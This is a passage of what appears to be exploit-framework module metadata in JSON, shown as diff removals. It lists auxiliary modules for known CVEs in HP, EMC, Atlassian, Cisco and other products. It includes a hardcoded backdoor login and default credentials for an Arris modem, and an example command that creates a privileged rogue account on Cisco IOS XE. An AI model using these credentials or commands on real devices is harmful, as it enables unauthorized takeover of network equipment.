READ_LOGS, LIST_SERVICES,\n STOP_SERVICE, START_SERVICE, SET_LOGFILE.", - "references": [ - "CVE-2008-0926", - "BID-28441", - "OSVDB-43690" - ], - "platform": "", - "arch": "", - "rport": 8028, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb", - "is_install_path": true, - "ref_name": "admin/edirectory/edirectory_edirutil", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "GET_DN", - "description": "Get DN" - }, - { - "name": "LIST_SERVICES", - "description": "List services" - }, - { - "name": "READ_LOGS", - "description": "Read all the log files" - }, - { - "name": "SET_LOGFILE", - "description": "Read Log File" - }, - { - "name": "START_SERVICE", - "description": "Start a service" - }, - { - "name": "STOP_SERVICE", - "description": "Stop a service" - } - ] - }, - "auxiliary_admin/emc/alphastor_devicemanager_exec": { - "name": "EMC AlphaStor Device Manager Arbitrary Command Execution", - "fullname": "auxiliary/admin/emc/alphastor_devicemanager_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-05-27", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", - "references": [ - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703", - "OSVDB-45715", - "CVE-2008-2157", - "BID-29398" - ], - "platform": "", - "arch": "", - "rport": 3000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb", - "is_install_path": true, - "ref_name": "admin/emc/alphastor_devicemanager_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/emc/alphastor_librarymanager_exec": { - "name": "EMC AlphaStor Library Manager Arbitrary Command Execution", - "fullname": "auxiliary/admin/emc/alphastor_librarymanager_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-05-27", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", - "references": [ - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703", - "CVE-2008-2157", - "OSVDB-45715", - "BID-29398" - ], - "platform": "", - "arch": "", - "rport": 3500, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb", - "is_install_path": true, - "ref_name": "admin/emc/alphastor_librarymanager_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/firetv/firetv_youtube": { - "name": "Amazon Fire TV YouTube Remote Control", - "fullname": "auxiliary/admin/firetv/firetv_youtube", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "wvu " - ], - "description": "This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.", - "references": [ - "URL-http://http://web.archive.org/web/20210301101536/http://www.amazon.com/dp/B00CX5P8FC/?_encoding=UTF8", - "URL-https://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs" - ], - "platform": "", - "arch": "", - "rport": 8008, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 11:29:59 +0000", - "path": "/modules/auxiliary/admin/firetv/firetv_youtube.rb", - "is_install_path": true, - "ref_name": "admin/firetv/firetv_youtube", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Play", - "description": "Play video" - }, - { - "name": "Stop", - "description": "Stop video" - } - ] - }, - "auxiliary_admin/hp/hp_data_protector_cmd": { - "name": "HP Data Protector 6.1 EXEC_CMD Command Execution", - "fullname": "auxiliary/admin/hp/hp_data_protector_cmd", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-07", - "type": "auxiliary", - "author": [ - "ch0ks", - "c4an", - "wireghoul", - "sinn3r " - ], - "description": "This module exploits HP Data Protector's omniinet process, specifically\n against a Windows setup.\n\n When an EXEC_CMD packet is sent, omniinet.exe will attempt to look\n for that user-supplied filename with kernel32!FindFirstFileW(). If the file\n is found, the process will then go ahead execute it with CreateProcess()\n under a new thread. If the filename isn't found, FindFirstFileW() will throw\n an error (0x03), and then bails early without triggering CreateProcess().\n\n Because of these behaviors, if you try to supply an argument, FindFirstFileW()\n will look at that as part of the filename, and then bail.\n\n Please note that when you specify the 'CMD' option, the base path begins\n under C:\\.", - "references": [ - "CVE-2011-0923", - "OSVDB-72526", - "ZDI-11-055", - "URL-https://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux/" - ], - "platform": "", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb", - "is_install_path": true, - "ref_name": "admin/hp/hp_data_protector_cmd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/hp/hp_ilo_create_admin_account": { - "name": "HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation", - "fullname": "auxiliary/admin/hp/hp_ilo_create_admin_account", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-08-24", - "type": "auxiliary", - "author": [ - "Fabien Perigaud " - ], - "description": "This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer\n overflow in the Connection HTTP header handling by the web server.\n Exploiting this vulnerability gives full access to the REST API, allowing arbitrary\n accounts creation.", - "references": [ - "CVE-2017-12542", - "BID-100467", - "URL-https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-hpesbhf03769en_us", - "URL-https://www.synacktiv.com/en/publications/hp-ilo-talk-at-recon-brx-2018.html" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb", - "is_install_path": true, - "ref_name": "admin/hp/hp_ilo_create_admin_account", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/hp/hp_imc_som_create_account": { - "name": "HP Intelligent Management SOM Account Creation", - "fullname": "auxiliary/admin/hp/hp_imc_som_create_account", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-08", - "type": "auxiliary", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.", - "references": [ - "CVE-2013-4824", - "OSVDB-98249", - "BID-62902", - "ZDI-13-240", - "URL-https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-c03943547" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb", - "is_install_path": true, - "ref_name": "admin/hp/hp_imc_som_create_account", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/allegro_rompager_auth_bypass": { - "name": "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass", - "fullname": "auxiliary/admin/http/allegro_rompager_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-12-17", - "type": "auxiliary", - "author": [ - "Jon Hart ", - "Jan Trencansky ", - "Lior Oppenheim" - ], - "description": "This module exploits HTTP servers that appear to be vulnerable to the\n 'Misfortune Cookie' vulnerability which affects Allegro Software\n Rompager versions before 4.34 and can allow attackers to authenticate\n to the HTTP service as an administrator without providing valid\n credentials.", - "references": [ - "CVE-2014-9222", - "URL-https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/", - "URL-https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf", - "URL-https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/http/allegro_rompager_auth_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/arris_motorola_surfboard_backdoor_xss": { - "name": "Arris / Motorola Surfboard SBG6580 Web Interface Takeover", - "fullname": "auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-04-08", - "type": "auxiliary", - "author": [ - "joev " - ], - "description": "The web interface for the Arris / Motorola Surfboard SBG6580 has\n several vulnerabilities that, when combined, allow an arbitrary website to take\n control of the modem, even if the user is not currently logged in. The attacker\n must successfully know, or guess, the target's internal gateway IP address.\n This is usually a default value of 192.168.0.1.\n\n First, a hardcoded backdoor account was discovered in the source code\n of one device with the credentials \"technician/yZgO8Bvj\". Due to lack of CSRF\n in the device's login form, these credentials - along with the default\n \"admin/motorola\" - can be sent to the device by an arbitrary website, thus\n inadvertently logging the user into the router.\n\n Once successfully logged in, a persistent XSS vulnerability is\n exploited in the firewall configuration page. This allows injection of\n Javascript that can perform any available action in the router interface.\n\n The following firmware versions have been tested as vulnerable:\n\n SBG6580-6.5.2.0-GA-06-077-NOSH, and\n SBG6580-8.6.1.0-GA-04-098-NOSH", - "references": [ - "CVE-2015-0964", - "CVE-2015-0965", - "CVE-2015-0966", - "URL-http://web.archive.org/web/20220810083803/https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb", - "is_install_path": true, - "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_admin/http/atlassian_confluence_auth_bypass": { - "name": "Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control", - "fullname": "auxiliary/admin/http/atlassian_confluence_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2023-10-04", - "type": "auxiliary", - "author": [ - "Unknown", - "Emir Polat" - ], - "description": "This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.\n A specially crafted request can be create new admin account without authentication on the target Atlassian server.", - "references": [ - "CVE-2023-22515", - "URL-https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2023-22515", - "URL-https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis" - ], - "platform": "", - "arch": "", - "rport": 8090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-10-19 17:11:03 +0000", - "path": "/modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/http/atlassian_confluence_auth_bypass", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/axigen_file_access": { - "name": "Axigen Arbitrary File Read and Delete", - "fullname": "auxiliary/admin/http/axigen_file_access", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-10-31", - "type": "auxiliary", - "author": [ - "Zhao Liang", - "juan vazquez " - ], - "description": "This module exploits a directory traversal vulnerability in the WebAdmin\n interface of Axigen, which allows an authenticated user to read and delete\n arbitrary files with SYSTEM privileges. The vulnerability is known to work on\n Windows platforms. This module has been tested successfully on Axigen 8.10 over\n Windows 2003 SP2.", - "references": [ - "US-CERT-VU-586556", - "CVE-2012-4940", - "OSVDB-86802" - ], - "platform": "", - "arch": "", - "rport": 9000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/axigen_file_access.rb", - "is_install_path": true, - "ref_name": "admin/http/axigen_file_access", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Delete", - "description": "Delete remote file" - }, - { - "name": "Read", - "description": "Read remote file" - } - ] - }, - "auxiliary_admin/http/cfme_manageiq_evm_pass_reset": { - "name": "Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection", - "fullname": "auxiliary/admin/http/cfme_manageiq_evm_pass_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-12", - "type": "auxiliary", - "author": [ - "Ramon de C Valle " - ], - "description": "This module exploits a SQL injection vulnerability in the \"explorer\"\n action of \"miq_policy\" controller of the Red Hat CloudForms Management\n Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by\n changing the password of the target account to the specified password.", - "references": [ - "CVE-2013-2050", - "CWE-89", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=959062" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb", - "is_install_path": true, - "ref_name": "admin/http/cfme_manageiq_evm_pass_reset", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cisco_7937g_ssh_privesc": { - "name": "Cisco 7937G SSH Privilege Escalation", - "fullname": "auxiliary/admin/http/cisco_7937g_ssh_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-06-02", - "type": "auxiliary", - "author": [ - "Cody Martin" - ], - "description": "This module exploits a feature that should not be available \n\tvia the web interface. An unauthenticated user may change \n\tthe credentials for SSH access to any username and password \n\tcombination desired, giving access to administrative \n\tfunctions through an SSH connection.", - "references": [ - "URL-https://web.archive.org/web/20200921054955/https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", - "CVE-2020-16137" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py", - "is_install_path": true, - "ref_name": "admin/http/cisco_7937g_ssh_privesc", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cisco_ios_xe_cli_exec_cve_2023_20198": { - "name": "Cisco IOX XE unauthenticated Command Line Interface (CLI) execution", - "fullname": "auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198", - "aliases": [], - "rank": 300, - "disclosure_date": "2023-10-16", - "type": "auxiliary", - "author": [ - "sfewer-r7" - ], - "description": "This module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the\n Web UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15.\n\n You must specify the IOS command mode to execute a CLI command in. Valid modes are `user`, `privileged`, and\n `global`. To run a command in \"Privileged\" mode, set the `CMD` option to the command you want to run,\n e.g. `show version` and set the `MODE` to `privileged`. To run a command in \"Global Configuration\" mode, set\n the `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r` and set\n the `MODE` to `global`.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW", - "references": [ - "CVE-2023-20198", - "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z", - "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/", - "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml", - "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/", - "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.rb", - "is_install_path": true, - "ref_name": "admin/http/cisco_ios_xe_cli_exec_cve_2023_20198", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cisco_ios_xe_os_exec_cve_2023_20273": { - "name": "Cisco IOX XE unauthenticated OS command execution", - "fullname": "auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273", - "aliases": [], - "rank": 300, - "disclosure_date": "2023-10-16", - "type": "auxiliary", - "author": [ - "sfewer-r7" - ], - "description": "This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE\n devices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges.\n\n This module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user,\n CVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read\n back via the webserver. Finally the output file is deleted and the admin user is removed.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW\n\n NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even\n though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.", - "references": [ - "CVE-2023-20198", - "CVE-2023-20273", - "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z", - "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/", - "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml", - "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/", - "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/", - "URL-https://blog.leakix.net/2023/10/cisco-root-privesc/" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-03-27 16:51:16 +0000", - "path": "/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb", - "is_install_path": true, - "ref_name": "admin/http/cisco_ios_xe_os_exec_cve_2023_20273", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cisco_ssm_onprem_account": { - "name": "Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419)", - "fullname": "auxiliary/admin/http/cisco_ssm_onprem_account", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-07-20", - "type": "auxiliary", - "author": [ - "Michael Heinzl", - "Mohammed Adel" - ], - "description": "This module exploits an improper access control vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206. An unauthenticated remote attacker\n can change the password of any existing user, including administrative users.", - "references": [ - "CVE-2024-20419", - "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy#vp", - "URL-https://www.0xpolar.com/blog/CVE-2024-20419" - ], - "platform": "", - "arch": "", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-09-23 14:16:26 +0000", - "path": "/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb", - "is_install_path": true, - "ref_name": "admin/http/cisco_ssm_onprem_account", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cnpilot_r_cmd_exec": { - "name": "Cambium cnPilot r200/r201 Command Execution as 'root'", - "fullname": "auxiliary/admin/http/cnpilot_r_cmd_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Karn Ganeshen " - ], - "description": "Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to\n 4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is\n accessible via a specific url, to any authenticated user. The module uses this\n shell to execute 